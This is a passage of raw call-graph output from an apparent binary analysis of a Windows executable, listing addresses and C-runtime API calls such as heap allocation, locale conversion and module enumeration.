GetProcAddress 18467->18468 18468->18471 18472 4021aa 18468->18472 18469->18452 18470 401dad Module32Next 18469->18470 18470->18446 18470->18469 18471->18325 18472->18471 19430 4018f0 18472->19430 18474 40243f 18474->18471 18475 40b6b5 __crtGetStringTypeA_stat 63 API calls 18474->18475 18475->18471 18476 4021f1 18476->18474 19442 401870 18476->19442 18478 402269 VariantInit 18479 401870 76 API calls 18478->18479 18480 40228b VariantInit 18479->18480 18481 4022a7 18480->18481 18482 4022d9 SafeArrayCreate SafeArrayAccessData 18481->18482 19447 40b350 18482->19447 18485 40232c 18486 402354 SafeArrayDestroy 18485->18486 18494 40235b 18485->18494 18486->18494 18487 402392 SafeArrayCreateVector 18488 4023a4 18487->18488 18489 4023bc VariantClear VariantClear 18488->18489 19449 4019a0 18489->19449 18492 40242e 18493 4019a0 66 API calls 18492->18493 18493->18474 18494->18487 19721 40e8de 18495->19721 18497 40ea1b 18497->18326 18499 40cbc2 18498->18499 18500 40cbc7 18498->18500 18502 40ec4d __FF_MSGBANNER 63 API calls 18499->18502 18501 40eaa2 __NMSG_WRITE 63 API calls 18500->18501 18503 40cbcf 18501->18503 18502->18500 18504 40e7ee __mtinitlocknum 4 API calls 18503->18504 18505 40cbd9 18504->18505 18505->18299 18507 40ec4d __FF_MSGBANNER 63 API calls 18506->18507 18508 40e7a4 18507->18508 18509 40eaa2 __NMSG_WRITE 63 API calls 18508->18509 18510 40e7ac 18509->18510 18511 4104e9 __decode_pointer 6 API calls 18510->18511 18512 40cc71 18511->18512 18512->18307 18514 40e8de _doexit 63 API calls 18513->18514 18515 40ea41 18514->18515 18515->18329 18517 40e775 Sleep GetModuleHandleW 18516->18517 18518 40e793 18517->18518 18519 40e797 18517->18519 18518->18517 18518->18519 18519->18334 18581 4104e0 18520->18581 18522 40ea5c __init_pointers __initp_misc_winsig 18584 41393d 18522->18584 18525 41046e __encode_pointer 6 API calls 18526 40ea98 18525->18526 18527 41046e TlsGetValue 18526->18527 18528 4104a7 GetModuleHandleW 18527->18528 18529 410486 18527->18529 18530 4104c2 GetProcAddress 18528->18530 18531 4104b7 18528->18531 18529->18528 18532 410490 TlsGetValue 18529->18532 18534 41049f 18530->18534 18533 40e76a __crt_waiting_on_module_handle 2 API calls 18531->18533 18535 41049b 18532->18535 18536 4104bd 18533->18536 18534->18349 18535->18528 18535->18534 18536->18530 18536->18534 18538 40d56f 18537->18538 18540 40d59d 18538->18540 18587 41389c 18538->18587 18540->18336 18541 4104e9 TlsGetValue 18540->18541 18542 410501 18541->18542 18543 410522 GetModuleHandleW 18541->18543 18542->18543 18546 41050b TlsGetValue 18542->18546 18544 410532 18543->18544 18545 41053d GetProcAddress 18543->18545 18547 40e76a __crt_waiting_on_module_handle 2 API calls 18544->18547 18548 41051a 18545->18548 18550 410516 18546->18550 18549 410538 18547->18549 18548->18336 18551 411cba 18548->18551 18549->18545 18549->18548 18550->18543 18550->18548 18553 411cc3 18551->18553 18554 4109c5 18553->18554 18555 411ce1 Sleep 18553->18555 18592 40e231 18553->18592 18554->18336 18554->18361 18556 411cf6 18555->18556 18556->18553 18556->18554 18860 40e1d8 18557->18860 18559 4105e1 GetModuleHandleW 18560 4105f1 18559->18560 18561 4105f7 18559->18561 18562 40e76a __crt_waiting_on_module_handle 2 API calls 18560->18562 18563 410633 18561->18563 18564 41060f GetProcAddress GetProcAddress 18561->18564 18562->18561 18565 40d6e0 __lock 59 API calls 18563->18565 18564->18563 18566 410652 InterlockedIncrement 18565->18566 18861 4106aa 18566->18861 18569 40d6e0 __lock 59 API calls 18570 410673 18569->18570 18864 4145d2 InterlockedIncrement 18570->18864 18572 410691 18876 4106b3 18572->18876 18574 41069e __close 18574->18365 18576 4105a2 18575->18576 18580 4105ae 18575->18580 18577 4104e9 __decode_pointer 6 API calls 18576->18577 18577->18580 18578 4105d0 18578->18578 18579 4105c2 TlsFree 18579->18578 18580->18578 18580->18579 18582 41046e __encode_pointer 6 API calls 18581->18582 18583 4104e7 18582->18583 18583->18522 18585 41046e __encode_pointer 6 API calls 18584->18585 18586 40ea8e 18585->18586 18586->18525 18591 40e1d8 18587->18591 18589 4138a8 InitializeCriticalSectionAndSpinCount 18590 4138ec __close 18589->18590 18590->18538 18591->18589 18593 40e23d __close 18592->18593 18594 40e255 18593->18594 18604 40e274 _memset 18593->18604 18605 40bfc1 18594->18605 18598 40e2e6 HeapAlloc 18598->18604 18599 40e26a __close 18599->18553 18604->18598 18604->18599 18611 40d6e0 18604->18611 18618 40def2 18604->18618 18624 40e32d 18604->18624 18627 40d2e3 18604->18627 18630 4106bc GetLastError 18605->18630 18607 40bfc6 18608 40e744 18607->18608 18609 4104e9 __decode_pointer 6 API calls 18608->18609 18610 40e754 __invoke_watson 18609->18610 18612 40d6f5 18611->18612 18613 40d708 EnterCriticalSection 18611->18613 18655 40d61d 18612->18655 18613->18604 18615 40d6fb 18615->18613 18616 40e79a __amsg_exit 62 API calls 18615->18616 18617 40d707 18616->18617 18617->18613 18621 40df20 18618->18621 18619 40dfb9 18623 40dfc2 18619->18623 18855 40db09 18619->18855 18621->18619 18621->18623 18848 40da59 18621->18848 18623->18604 18859 40d606 LeaveCriticalSection 18624->18859 18626 40e334 18626->18604 18628 4104e9 __decode_pointer 6 API calls 18627->18628 18629 40d2f3 18628->18629 18629->18604 18644 410564 TlsGetValue 18630->18644 18633 410729 SetLastError 18633->18607 18634 411cba __calloc_crt 60 API calls 18635 4106e7 18634->18635 18635->18633 18636 4104e9 __decode_pointer 6 API calls 18635->18636 18637 410701 18636->18637 18638 410720 18637->18638 18639 410708 18637->18639 18649 40b6b5 18638->18649 18640 4105d5 __initptd 60 API calls 18639->18640 18642 410710 GetCurrentThreadId 18640->18642 18642->18633 18643 410726 18643->18633 18645 410594 18644->18645 18646 410579 18644->18646 18645->18633 18645->18634 18647 4104e9 __decode_pointer 6 API calls 18646->18647 18648 410584 TlsSetValue 18647->18648 18648->18645 18650 40b6c1 __close 18649->18650 18651 40b73d __close 18650->18651 18652 40b714 HeapFree 18650->18652 18651->18643 18652->18651 18653 40b727 18652->18653 18654 40bfc1 __wctomb_s_l 62 API calls 18653->18654 18654->18651 18656 40d629 __close 18655->18656 18657 40d64f 18656->18657 18681 40ec4d 18656->18681 18665 40d65f __close 18657->18665 18727 411c75 18657->18727 18663 40d680 18668 40d6e0 __lock 63 API calls 18663->18668 18664 40d671 18667 40bfc1 __wctomb_s_l 63 API calls 18664->18667 18665->18615 18667->18665 18670 40d687 18668->18670 18671 40d6bb 18670->18671 18672 40d68f 18670->18672 18673 40b6b5 __crtGetStringTypeA_stat 63 API calls 18671->18673 18674 41389c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 18672->18674 18675 40d6ac 18673->18675 18676 40d69a 18674->18676 18732 40d6d7 18675->18732 18676->18675 18678 40b6b5 __crtGetStringTypeA_stat 63 API calls 18676->18678 18679 40d6a6 18678->18679 18680 40bfc1 __wctomb_s_l 63 API calls 18679->18680 18680->18675 18735 413d5b 18681->18735 18684 40ec61 18686 40eaa2 __NMSG_WRITE 63 API calls 18684->18686 18688 40d63e 18684->18688 18685 413d5b __set_error_mode 63 API calls 18685->18684 18687 40ec79 18686->18687 18689 40eaa2 __NMSG_WRITE 63 API calls 18687->18689 18690 40eaa2 18688->18690 18689->18688 18691 40eab6 18690->18691 18692 40d645 18691->18692 18693 413d5b __set_error_mode 60 API calls 18691->18693 18724 40e7ee 18692->18724 18694 40ead8 18693->18694 18695 40ec16 GetStdHandle 18694->18695 18696 413d5b __set_error_mode 60 API calls 18694->18696 18695->18692 18697 40ec24 _strlen 18695->18697 18698 40eae9 18696->18698 18697->18692 18700 40ec3d WriteFile 18697->18700 18698->18695 18699 40eafb 18698->18699 18699->18692 18741 40ef42 18699->18741 18700->18692 18703 40eb31 GetModuleFileNameA 18705 40eb4f 18703->18705 18709 40eb72 _strlen 18703->18709 18707 40ef42 _strcpy_s 60 API calls 18705->18707 18708 40eb5f 18707->18708 18708->18709 18711 40e61c __invoke_watson 10 API calls 18708->18711 18710 40ebb5 18709->18710 18757 411da6 18709->18757 18766 413ce7 18710->18766 18711->18709 18715 40ebd9 18718 413ce7 _strcat_s 60 API calls 18715->18718 18717 40e61c __invoke_watson 10 API calls 18717->18715 18719 40ebed 18718->18719 18721 40ebfe 18719->18721 18722 40e61c __invoke_watson 10 API calls 18719->18722 18720 40e61c __invoke_watson 10 API calls 18720->18710 18775 413b7e 18721->18775 18722->18721 18813 40e7c3 GetModuleHandleW 18724->18813 18728 411c7e 18727->18728 18730 40d66a 18728->18730 18731 411c95 Sleep 18728->18731 18817 40b84d 18728->18817 18730->18663 18730->18664 18731->18728 18847 40d606 LeaveCriticalSection 18732->18847 18734 40d6de 18734->18665 18736 413d6a 18735->18736 18737 40bfc1 __wctomb_s_l 63 API calls 18736->18737 18740 40ec54 18736->18740 18738 413d8d 18737->18738 18739 40e744 __wctomb_s_l 6 API calls 18738->18739 18739->18740 18740->18684 18740->18685 18742 40ef53 18741->18742 18743 40ef5a 18741->18743 18742->18743 18748 40ef80 18742->18748 18744 40bfc1 __wctomb_s_l 63 API calls 18743->18744 18745 40ef5f 18744->18745 18746 40e744 __wctomb_s_l 6 API calls 18745->18746 18747 40eb1d 18746->18747 18747->18703 18750 40e61c 18747->18750 18748->18747 18749 40bfc1 __wctomb_s_l 63 API calls 18748->18749 18749->18745 18802 40ba30 18750->18802 18752 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18753 40e725 GetCurrentProcess TerminateProcess 18752->18753 18755 40e719 __invoke_watson 18752->18755 18804 40ce09 18753->18804 18755->18753 18756 40e742 18756->18703 18762 411db8 18757->18762 18758 411dbc 18759 40bfc1 __wctomb_s_l 63 API calls 18758->18759 18760 40eba2 18758->18760 18761 411dd8 18759->18761 18760->18710 18760->18720 18763 40e744 __wctomb_s_l 6 API calls 18761->18763 18762->18758 18762->18760 18764 411e02 18762->18764 18763->18760 18764->18760 18765 40bfc1 __wctomb_s_l 63 API calls 18764->18765 18765->18761 18767 413cff 18766->18767 18770 413cf8 18766->18770 18768 40bfc1 __wctomb_s_l 63 API calls 18767->18768 18769 413d04 18768->18769 18771 40e744 __wctomb_s_l 6 API calls 18769->18771 18770->18767 18773 413d33 18770->18773 18772 40ebc8 18771->18772 18772->18715 18772->18717 18773->18772 18774 40bfc1 __wctomb_s_l 63 API calls 18773->18774 18774->18769 18776 4104e0 __init_pointers 6 API calls 18775->18776 18777 413b8e 18776->18777 18778 413ba1 LoadLibraryA 18777->18778 18780 413c29 18777->18780 18779 413bb6 GetProcAddress 18778->18779 18786 413ccb 18778->18786 18781 413bcc 18779->18781 18779->18786 18784 4104e9 __decode_pointer 6 API calls 18780->18784 18797 413c53 18780->18797 18785 41046e __encode_pointer 6 API calls 18781->18785 18782 4104e9 __decode_pointer 6 API calls 18782->18786 18783 4104e9 __decode_pointer 6 API calls 18794 413c96 18783->18794 18787 413c46 18784->18787 18788 413bd2 GetProcAddress 18785->18788 18786->18692 18790 4104e9 __decode_pointer 6 API calls 18787->18790 18789 41046e __encode_pointer 6 API calls 18788->18789 18791 413be7 GetProcAddress 18789->18791 18790->18797 18792 41046e __encode_pointer 6 API calls 18791->18792 18793 413bfc GetProcAddress 18792->18793 18795 41046e __encode_pointer 6 API calls 18793->18795 18796 4104e9 __decode_pointer 6 API calls 18794->18796 18799 413c7e 18794->18799 18798 413c11 18795->18798 18796->18799 18797->18783 18797->18799 18798->18780 18800 413c1b GetProcAddress 18798->18800 18799->18782 18801 41046e __encode_pointer 6 API calls 18800->18801 18801->18780 18803 40ba3c __VEC_memzero 18802->18803 18803->18752 18805 40ce11 18804->18805 18806 40ce13 IsDebuggerPresent 18804->18806 18805->18756 18812 4138fc 18806->18812 18809 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 18810 413723 __invoke_watson 18809->18810 18811 41372b GetCurrentProcess TerminateProcess 18809->18811 18810->18811 18811->18756 18812->18809 18814 40e7d7 GetProcAddress 18813->18814 18815 40e7ec ExitProcess 18813->18815 18814->18815 18816 40e7e7 CorExitProcess 18814->18816 18816->18815 18818 40b900 18817->18818 18824 40b85f 18817->18824 18819 40d2e3 _realloc 6 API calls 18818->18819 18821 40b906 18819->18821 18820 40b870 18822 40ec4d __FF_MSGBANNER 62 API calls 18820->18822 18820->18824 18826 40eaa2 __NMSG_WRITE 62 API calls 18820->18826 18828 40e7ee __mtinitlocknum 4 API calls 18820->18828 18823 40bfc1 __wctomb_s_l 62 API calls 18821->18823 18822->18820 18829 40b8f8 18823->18829 18824->18820 18827 40b8bc RtlAllocateHeap 18824->18827 18824->18829 18830 40b8ec 18824->18830 18831 40d2e3 _realloc 6 API calls 18824->18831 18833 40b8f1 18824->18833 18835 40b7fe 18824->18835 18826->18820 18827->18824 18828->18820 18829->18728 18832 40bfc1 __wctomb_s_l 62 API calls 18830->18832 18831->18824 18832->18833 18834 40bfc1 __wctomb_s_l 62 API calls 18833->18834 18834->18829 18836 40b80a __close 18835->18836 18837 40b83b __close 18836->18837 18838 40d6e0 __lock 63 API calls 18836->18838 18837->18824 18839 40b820 18838->18839 18840 40def2 ___sbh_alloc_block 5 API calls 18839->18840 18841 40b82b 18840->18841 18843 40b844 18841->18843 18846 40d606 LeaveCriticalSection 18843->18846 18845 40b84b 18845->18837 18846->18845 18847->18734 18849 40daa0 HeapAlloc 18848->18849 18850 40da6c HeapReAlloc 18848->18850 18851 40da8a 18849->18851 18853 40dac3 VirtualAlloc 18849->18853 18850->18851 18852 40da8e 18850->18852 18851->18619 18852->18849 18853->18851 18854 40dadd HeapFree 18853->18854 18854->18851 18856 40db20 VirtualAlloc 18855->18856 18858 40db67 18856->18858 18858->18623 18859->18626 18860->18559 18879 40d606 LeaveCriticalSection 18861->18879 18863 41066c 18863->18569 18865 4145f0 InterlockedIncrement 18864->18865 18866 4145f3 18864->18866 18865->18866 18867 414600 18866->18867 18868 4145fd InterlockedIncrement 18866->18868 18869 41460a InterlockedIncrement 18867->18869 18870 41460d 18867->18870 18868->18867 18869->18870 18871 414617 InterlockedIncrement 18870->18871 18873 41461a 18870->18873 18871->18873 18872 414633 InterlockedIncrement 18872->18873 18873->18872 18874 414643 InterlockedIncrement 18873->18874 18875 41464e InterlockedIncrement 18873->18875 18874->18873 18875->18572 18880 40d606 LeaveCriticalSection 18876->18880 18878 4106ba 18878->18574 18879->18863 18880->18878 18881->18368 18884 41265c 18882->18884 18886 4126c9 18884->18886 18892 416836 18884->18892 18885 4127c7 18885->18414 18885->18415 18886->18885 18887 416836 73 API calls _parse_cmdline 18886->18887 18887->18886 18889 414474 18888->18889 18891 41447b 18888->18891 19114 4142d1 18889->19114 18891->18408 18895 4167e3 18892->18895 18898 40ec86 18895->18898 18899 40ec99 18898->18899 18903 40ece6 18898->18903 18906 410735 18899->18906 18902 40ecc6 18902->18903 18926 413fcc 18902->18926 18903->18884 18907 4106bc __getptd_noexit 63 API calls 18906->18907 18908 41073d 18907->18908 18909 40e79a __amsg_exit 63 API calls 18908->18909 18910 40ec9e 18908->18910 18909->18910 18910->18902 18911 414738 18910->18911 18912 414744 __close 18911->18912 18913 410735 __getptd 63 API calls 18912->18913 18914 414749 18913->18914 18915 414777 18914->18915 18916 41475b 18914->18916 18917 40d6e0 __lock 63 API calls 18915->18917 18918 410735 __getptd 63 API calls 18916->18918 18919 41477e 18917->18919 18920 414760 18918->18920 18942 4146fa 18919->18942 18924 41476e __close 18920->18924 18925 40e79a __amsg_exit 63 API calls 18920->18925 18924->18902 18925->18924 18927 413fd8 __close 18926->18927 18928 410735 __getptd 63 API calls 18927->18928 18929 413fdd 18928->18929 18930 413fef 18929->18930 18931 40d6e0 __lock 63 API calls 18929->18931 18934 413ffd __close 18930->18934 18938 40e79a __amsg_exit 63 API calls 18930->18938 18932 41400d 18931->18932 18933 414056 18932->18933 18935 414024 InterlockedDecrement 18932->18935 18936 41403e InterlockedIncrement 18932->18936 19110 414067 18933->19110 18934->18903 18935->18936 18939 41402f 18935->18939 18936->18933 18938->18934 18939->18936 18940 40b6b5 __crtGetStringTypeA_stat 63 API calls 18939->18940 18941 41403d 18940->18941 18941->18936 18943 4146fe 18942->18943 18949 414730 18942->18949 18944 4145d2 ___addlocaleref 8 API calls 18943->18944 18943->18949 18945 414711 18944->18945 18945->18949 18953 414661 18945->18953 18950 4147a2 18949->18950 19109 40d606 LeaveCriticalSection 18950->19109 18952 4147a9 18952->18920 18954 414672 InterlockedDecrement 18953->18954 18955 4146f5 18953->18955 18956 414687 InterlockedDecrement 18954->18956 18957 41468a 18954->18957 18955->18949 18967 414489 18955->18967 18956->18957 18958 414694 InterlockedDecrement 18957->18958 18959 414697 18957->18959 18958->18959 18960 4146a1 InterlockedDecrement 18959->18960 18961 4146a4 18959->18961 18960->18961 18962 4146ae InterlockedDecrement 18961->18962 18963 4146b1 18961->18963 18962->18963 18964 4146ca InterlockedDecrement 18963->18964 18965 4146da InterlockedDecrement 18963->18965 18966 4146e5 InterlockedDecrement 18963->18966 18964->18963 18965->18963 18966->18955 18968 4144a0 18967->18968 18969 41450d 18967->18969 18968->18969 18975 4144d4 18968->18975 18980 40b6b5 __crtGetStringTypeA_stat 63 API calls 18968->18980 18970 41455a 18969->18970 18971 40b6b5 __crtGetStringTypeA_stat 63 API calls 18969->18971 18983 414581 18970->18983 19021 417667 18970->19021 18973 41452e 18971->18973 18977 40b6b5 __crtGetStringTypeA_stat 63 API calls 18973->18977 18976 4144f5 18975->18976 18987 40b6b5 __crtGetStringTypeA_stat 63 API calls 18975->18987 18978 40b6b5 __crtGetStringTypeA_stat 63 API calls 18976->18978 18982 414541 18977->18982 18984 414502 18978->18984 18979 4145c6 18985 40b6b5 __crtGetStringTypeA_stat 63 API calls 18979->18985 18986 4144c9 18980->18986 18981 40b6b5 __crtGetStringTypeA_stat 63 API calls 18981->18983 18989 40b6b5 __crtGetStringTypeA_stat 63 API calls 18982->18989 18983->18979 18988 40b6b5 63 API calls __crtGetStringTypeA_stat 18983->18988 18990 40b6b5 __crtGetStringTypeA_stat 63 API calls 18984->18990 18991 4145cc 18985->18991 18997 417841 18986->18997 18993 4144ea 18987->18993 18988->18983 18994 41454f 18989->18994 18990->18969 18991->18949 19013 4177fc 18993->19013 18996 40b6b5 __crtGetStringTypeA_stat 63 API calls 18994->18996 18996->18970 18998 41784e 18997->18998 19012 4178cb 18997->19012 18999 41785f 18998->18999 19001 40b6b5 __crtGetStringTypeA_stat 63 API calls 18998->19001 19000 417871 18999->19000 19002 40b6b5 __crtGetStringTypeA_stat 63 API calls 18999->19002 19003 417883 19000->19003 19004 40b6b5 __crtGetStringTypeA_stat 63 API calls 19000->19004 19001->18999 19002->19000 19005 417895 19003->19005 19006 40b6b5 __crtGetStringTypeA_stat 63 API calls 19003->19006 19004->19003 19007 40b6b5 __crtGetStringTypeA_stat 63 API calls 19005->19007 19010 4178a7 19005->19010 19006->19005 19007->19010 19008 40b6b5 __crtGetStringTypeA_stat 63 API calls 19009 4178b9 19008->19009 19011 40b6b5 __crtGetStringTypeA_stat 63 API calls 19009->19011 19009->19012 19010->19008 19010->19009 19011->19012 19012->18975 19014 417809 19013->19014 19015 41783d 19013->19015 19016 417819 19014->19016 19017 40b6b5 __crtGetStringTypeA_stat 63 API calls 19014->19017 19015->18976 19018 41782b 19016->19018 19019 40b6b5 __crtGetStringTypeA_stat 63 API calls 19016->19019 19017->19016 19018->19015 19020 40b6b5 __crtGetStringTypeA_stat 63 API calls 19018->19020 19019->19018 19020->19015 19022 41457a 19021->19022 19023 417678 19021->19023 19022->18981 19024 40b6b5 __crtGetStringTypeA_stat 63 API calls 19023->19024 19025 417680 19024->19025 19026 40b6b5 __crtGetStringTypeA_stat 63 API calls 19025->19026 19027 417688 19026->19027 19028 40b6b5 __crtGetStringTypeA_stat 63 API calls 19027->19028 19029 417690 19028->19029 19030 40b6b5 __crtGetStringTypeA_stat 63 API calls 19029->19030 19031 417698 19030->19031 19032 40b6b5 __crtGetStringTypeA_stat 63 API calls 19031->19032 19033 4176a0 19032->19033 19034 40b6b5 __crtGetStringTypeA_stat 63 API calls 19033->19034 19035 4176a8 19034->19035 19036 40b6b5 __crtGetStringTypeA_stat 63 API calls 19035->19036 19037 4176af 19036->19037 19038 40b6b5 __crtGetStringTypeA_stat 63 API calls 19037->19038 19039 4176b7 19038->19039 19040 40b6b5 __crtGetStringTypeA_stat 63 API calls 19039->19040 19041 4176bf 19040->19041 19042 40b6b5 __crtGetStringTypeA_stat 63 API calls 19041->19042 19043 4176c7 19042->19043 19044 40b6b5 __crtGetStringTypeA_stat 63 API calls 19043->19044 19045 4176cf 19044->19045 19046 40b6b5 __crtGetStringTypeA_stat 63 API calls 19045->19046 19047 4176d7 19046->19047 19048 40b6b5 __crtGetStringTypeA_stat 63 API calls 19047->19048 19049 4176df 19048->19049 19050 40b6b5 __crtGetStringTypeA_stat 63 API calls 19049->19050 19051 4176e7 19050->19051 19052 40b6b5 __crtGetStringTypeA_stat 63 API calls 19051->19052 19053 4176ef 19052->19053 19054 40b6b5 __crtGetStringTypeA_stat 63 API calls 19053->19054 19055 4176f7 19054->19055 19056 40b6b5 __crtGetStringTypeA_stat 63 API calls 19055->19056 19057 417702 19056->19057 19058 40b6b5 __crtGetStringTypeA_stat 63 API calls 19057->19058 19059 41770a 19058->19059 19060 40b6b5 __crtGetStringTypeA_stat 63 API calls 19059->19060 19061 417712 19060->19061 19062 40b6b5 __crtGetStringTypeA_stat 63 API calls 19061->19062 19063 41771a 19062->19063 19064 40b6b5 __crtGetStringTypeA_stat 63 API calls 19063->19064 19065 417722 19064->19065 19066 40b6b5 __crtGetStringTypeA_stat 63 API calls 19065->19066 19067 41772a 19066->19067 19068 40b6b5 __crtGetStringTypeA_stat 63 API calls 19067->19068 19069 417732 19068->19069 19070 40b6b5 __crtGetStringTypeA_stat 63 API calls 19069->19070 19071 41773a 19070->19071 19072 40b6b5 __crtGetStringTypeA_stat 63 API calls 19071->19072 19073 417742 19072->19073 19074 40b6b5 __crtGetStringTypeA_stat 63 API calls 19073->19074 19075 41774a 19074->19075 19076 40b6b5 __crtGetStringTypeA_stat 63 API calls 19075->19076 19077 417752 19076->19077 19078 40b6b5 __crtGetStringTypeA_stat 63 API calls 19077->19078 19079 41775a 19078->19079 19080 40b6b5 __crtGetStringTypeA_stat 63 API calls 19079->19080 19081 417762 19080->19081 19082 40b6b5 __crtGetStringTypeA_stat 63 API calls 19081->19082 19083 41776a 19082->19083 19084 40b6b5 __crtGetStringTypeA_stat 63 API calls 19083->19084 19085 417772 19084->19085 19086 40b6b5 __crtGetStringTypeA_stat 63 API calls 19085->19086 19087 41777a 19086->19087 19088 40b6b5 __crtGetStringTypeA_stat 63 API calls 19087->19088 19089 417788 19088->19089 19090 40b6b5 __crtGetStringTypeA_stat 63 API calls 19089->19090 19091 417793 19090->19091 19092 40b6b5 __crtGetStringTypeA_stat 63 API calls 19091->19092 19093 41779e 19092->19093 19094 40b6b5 __crtGetStringTypeA_stat 63 API calls 19093->19094 19095 4177a9 19094->19095 19096 40b6b5 __crtGetStringTypeA_stat 63 API calls 19095->19096 19097 4177b4 19096->19097 19098 40b6b5 __crtGetStringTypeA_stat 63 API calls 19097->19098 19099 4177bf 19098->19099 19100 40b6b5 __crtGetStringTypeA_stat 63 API calls 19099->19100 19101 4177ca 19100->19101 19102 40b6b5 __crtGetStringTypeA_stat 63 API calls 19101->19102 19103 4177d5 19102->19103 19104 40b6b5 __crtGetStringTypeA_stat 63 API calls 19103->19104 19105 4177e0 19104->19105 19106 40b6b5 __crtGetStringTypeA_stat 63 API calls 19105->19106 19107 4177eb 19106->19107 19108 40b6b5 __crtGetStringTypeA_stat 63 API calls 19107->19108 19108->19022 19109->18952 19113 40d606 LeaveCriticalSection 19110->19113 19112 41406e 19112->18930 19113->19112 19115 4142dd __close 19114->19115 19116 410735 __getptd 63 API calls 19115->19116 19117 4142e6 19116->19117 19118 413fcc _LocaleUpdate::_LocaleUpdate 65 API calls 19117->19118 19119 4142f0 19118->19119 19145 414070 19119->19145 19122 411c75 __malloc_crt 63 API calls 19123 414311 19122->19123 19124 414430 __close 19123->19124 19152 4140ec 19123->19152 19124->18891 19127 414341 InterlockedDecrement 19129 414351 19127->19129 19130 414362 InterlockedIncrement 19127->19130 19128 41443d 19128->19124 19132 40b6b5 __crtGetStringTypeA_stat 63 API calls 19128->19132 19136 414450 19128->19136 19129->19130 19134 40b6b5 __crtGetStringTypeA_stat 63 API calls 19129->19134 19130->19124 19131 414378 19130->19131 19131->19124 19135 40d6e0 __lock 63 API calls 19131->19135 19132->19136 19133 40bfc1 __wctomb_s_l 63 API calls 19133->19124 19137 414361 19134->19137 19139 41438c InterlockedDecrement 19135->19139 19136->19133 19137->19130 19140 414408 19139->19140 19141 41441b InterlockedIncrement 19139->19141 19140->19141 19143 40b6b5 __crtGetStringTypeA_stat 63 API calls 19140->19143 19162 414432 19141->19162 19144 41441a 19143->19144 19144->19141 19146 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19145->19146 19147 414084 19146->19147 19148 4140ad 19147->19148 19149 41408f GetOEMCP 19147->19149 19150 4140b2 GetACP 19148->19150 19151 41409f 19148->19151 19149->19151 19150->19151 19151->19122 19151->19124 19153 414070 getSystemCP 75 API calls 19152->19153 19154 41410c 19153->19154 19155 414117 setSBCS 19154->19155 19157 41415b IsValidCodePage 19154->19157 19161 414180 _memset __setmbcp_nolock 19154->19161 19156 40ce09 __invoke_watson 5 API calls 19155->19156 19158 4142cf 19156->19158 19157->19155 19159 41416d GetCPInfo 19157->19159 19158->19127 19158->19128 19159->19155 19159->19161 19165 413e39 GetCPInfo 19161->19165 19298 40d606 LeaveCriticalSection 19162->19298 19164 414439 19164->19124 19166 413f1f 19165->19166 19168 413e6d _memset 19165->19168 19170 40ce09 __invoke_watson 5 API calls 19166->19170 19175 417625 19168->19175 19173 413fca 19170->19173 19173->19161 19174 417426 ___crtLCMapStringA 98 API calls 19174->19166 19176 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19175->19176 19177 417638 19176->19177 19185 41746b 19177->19185 19180 417426 19181 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19180->19181 19182 417439 19181->19182 19251 417081 19182->19251 19186 4174b7 19185->19186 19187 41748c GetStringTypeW 19185->19187 19188 41759e 19186->19188 19189 4174a4 19186->19189 19187->19189 19190 4174ac GetLastError 19187->19190 19213 417a20 GetLocaleInfoA 19188->19213 19191 4174f0 MultiByteToWideChar 19189->19191 19200 417598 19189->19200 19190->19186 19196 41751d 19191->19196 19191->19200 19193 40ce09 __invoke_watson 5 API calls 19194 413eda 19193->19194 19194->19180 19202 40b84d _malloc 63 API calls 19196->19202 19203 417532 _memset __crtGetStringTypeA_stat 19196->19203 19197 4175ef GetStringTypeA 19197->19200 19201 41760a 19197->19201 19199 41756b MultiByteToWideChar 19205 417581 GetStringTypeW 19199->19205 19206 417592 19199->19206 19200->19193 19207 40b6b5 __crtGetStringTypeA_stat 63 API calls 19201->19207 19202->19203 19203->19199 19203->19200 19205->19206 19209 4147ae 19206->19209 19207->19200 19210 4147ba 19209->19210 19211 4147cb 19209->19211 19210->19211 19212 40b6b5 __crtGetStringTypeA_stat 63 API calls 19210->19212 19211->19200 19212->19211 19214 417a53 19213->19214 19215 417a4e 19213->19215 19244 416f54 19214->19244 19217 40ce09 __invoke_watson 5 API calls 19215->19217 19218 4175c2 19217->19218 19218->19197 19218->19200 19219 417a69 19218->19219 19220 417aa9 GetCPInfo 19219->19220 19224 417b33 19219->19224 19221 417ac0 19220->19221 19222 417b1e MultiByteToWideChar 19220->19222 19221->19222 19225 417ac6 GetCPInfo 19221->19225 19222->19224 19228 417ad9 _strlen 19222->19228 19223 40ce09 __invoke_watson 5 API calls 19226 4175e3 19223->19226 19224->19223 19225->19222 19227 417ad3 19225->19227 19226->19197 19226->19200 19227->19222 19227->19228 19229 40b84d _malloc 63 API calls 19228->19229 19231 417b0b _memset __crtGetStringTypeA_stat 19228->19231 19229->19231 19230 417b68 MultiByteToWideChar 19232 417b80 19230->19232 19236 417b9f 19230->19236 19231->19224 19231->19230 19234 417ba4 19232->19234 19235 417b87 WideCharToMultiByte 19232->19235 19233 4147ae __freea 63 API calls 19233->19224 19237 417bc3 19234->19237 19238 417baf WideCharToMultiByte 19234->19238 19235->19236 19236->19233 19239 411cba __calloc_crt 63 API calls 19237->19239 19238->19236 19238->19237 19240 417bcb 19239->19240 19240->19236 19241 417bd4 WideCharToMultiByte 19240->19241 19241->19236 19242 417be6 19241->19242 19243 40b6b5 __crtGetStringTypeA_stat 63 API calls 19242->19243 19243->19236 19247 41a354 19244->19247 19248 41a36d 19247->19248 19249 41a125 strtoxl 87 API calls 19248->19249 19250 416f65 19249->19250 19250->19215 19252 4170a2 LCMapStringW 19251->19252 19255 4170bd 19251->19255 19253 4170c5 GetLastError 19252->19253 19252->19255 19253->19255 19254 4172bb 19258 417a20 ___ansicp 87 API calls 19254->19258 19255->19254 19256 417117 19255->19256 19257 4172b2 19256->19257 19259 417130 MultiByteToWideChar 19256->19259 19260 40ce09 __invoke_watson 5 API calls 19257->19260 19261 4172e3 19258->19261 19259->19257 19265 41715d 19259->19265 19262 413efa 19260->19262 19261->19257 19263 4173d7 LCMapStringA 19261->19263 19264 4172fc 19261->19264 19262->19174 19297 417333 19263->19297 19266 417a69 ___convertcp 70 API calls 19264->19266 19270 40b84d _malloc 63 API calls 19265->19270 19277 417176 __crtGetStringTypeA_stat 19265->19277 19271 41730e 19266->19271 19267 4171ae MultiByteToWideChar 19268 4171c7 LCMapStringW 19267->19268 19292 4172a9 